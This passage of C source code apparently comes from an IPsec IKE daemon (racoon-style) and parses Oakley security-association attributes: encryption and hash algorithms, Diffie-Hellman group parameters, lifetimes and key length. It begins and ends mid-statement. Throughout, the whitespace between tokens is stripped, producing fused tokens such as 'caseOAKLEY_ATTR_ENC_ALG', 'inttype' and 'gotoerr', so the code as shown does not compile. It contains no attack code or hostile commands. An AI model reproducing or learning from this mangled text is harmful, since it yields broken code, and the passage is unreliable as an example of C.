%d\n",len,tlen);return-1;}p=(u_char*)(d+1);}val=vmalloc(len);if(!val)return-1;memcpy(val->v,p,len);break;default:break;}switch(type){caseOAKLEY_ATTR_ENC_ALG:sa->enctype=(u_int16_t)ntohs(d->lorv);break;caseOAKLEY_ATTR_HASH_ALG:sa->hashtype=(u_int16_t)ntohs(d->lorv);break;caseOAKLEY_ATTR_AUTH_METHOD:sa->authmethod=ntohs(d->lorv);break;caseOAKLEY_ATTR_GRP_DESC:sa->dh_group=(u_int16_t)ntohs(d->lorv);break;caseOAKLEY_ATTR_GRP_TYPE:{inttype=(int)ntohs(d->lorv);if(type==OAKLEY_ATTR_GRP_TYPE_MODP)sa->dhgrp->type=type;elsereturn-1;break;}caseOAKLEY_ATTR_GRP_PI:sa->dhgrp->prime=val;break;caseOAKLEY_ATTR_GRP_GEN_ONE:vfree(val);if(!flag)sa->dhgrp->gen1=ntohs(d->lorv);else{intlen=ntohs(d->lorv);sa->dhgrp->gen1=0;if(len>4)return-1;memcpy(&sa->dhgrp->gen1,d+1,len);sa->dhgrp->gen1=ntohl(sa->dhgrp->gen1);}break;caseOAKLEY_ATTR_GRP_GEN_TWO:vfree(val);if(!flag)sa->dhgrp->gen2=ntohs(d->lorv);else{intlen=ntohs(d->lorv);sa->dhgrp->gen2=0;if(len>4)return-1;memcpy(&sa->dhgrp->gen2,d+1,len);sa->dhgrp->gen2=ntohl(sa->dhgrp->gen2);}break;caseOAKLEY_ATTR_GRP_CURVE_A:sa->dhgrp->curve_a=val;break;caseOAKLEY_ATTR_GRP_CURVE_B:sa->dhgrp->curve_b=val;break;caseOAKLEY_ATTR_SA_LD_TYPE:{inttype=(int)ntohs(d->lorv);switch(type){caseOAKLEY_ATTR_SA_LD_TYPE_SEC:caseOAKLEY_ATTR_SA_LD_TYPE_KB:life_t=type;break;default:life_t=OAKLEY_ATTR_SA_LD_TYPE_DEFAULT;break;}break;}caseOAKLEY_ATTR_SA_LD:if(!prev||(ntohs(prev->type)&~ISAKMP_GEN_MASK)!=OAKLEY_ATTR_SA_LD_TYPE){plog(ASL_LEVEL_ERR,"life duration must follow ltype\n");break;}switch(life_t){caseIPSECDOI_ATTR_SA_LD_TYPE_SEC:sa->lifetime=ipsecdoi_set_ld(val);vfree(val);if(sa->lifetime==0){plog(ASL_LEVEL_ERR,"invalid life duration.\n");gotoerr;}break;caseIPSECDOI_ATTR_SA_LD_TYPE_KB:sa->lifebyte=ipsecdoi_set_ld(val);vfree(val);if(sa->lifebyte==0){plog(ASL_LEVEL_ERR,"invalid life duration.\n");gotoerr;}break;default:vfree(val);plog(ASL_LEVEL_ERR,"invalid life type: %d\n",life_t);gotoerr;}break;caseOAKLEY_ATTR_KEY_LEN:{intlen=ntohs(d->lorv);if(len%8!=0){plog(ASL_LEVEL_ERR,"keylen %d: not multiple of 8\n",len);gotoerr;}sa->encklen=(u_int16_t)len;keylen++;break;}caseOAKLEY_ATTR_PRF:caseOAKLEY_ATTR_FIELD_SIZE:/* unsupported */break;caseOAKLEY_ATTR_GRP_ORDER: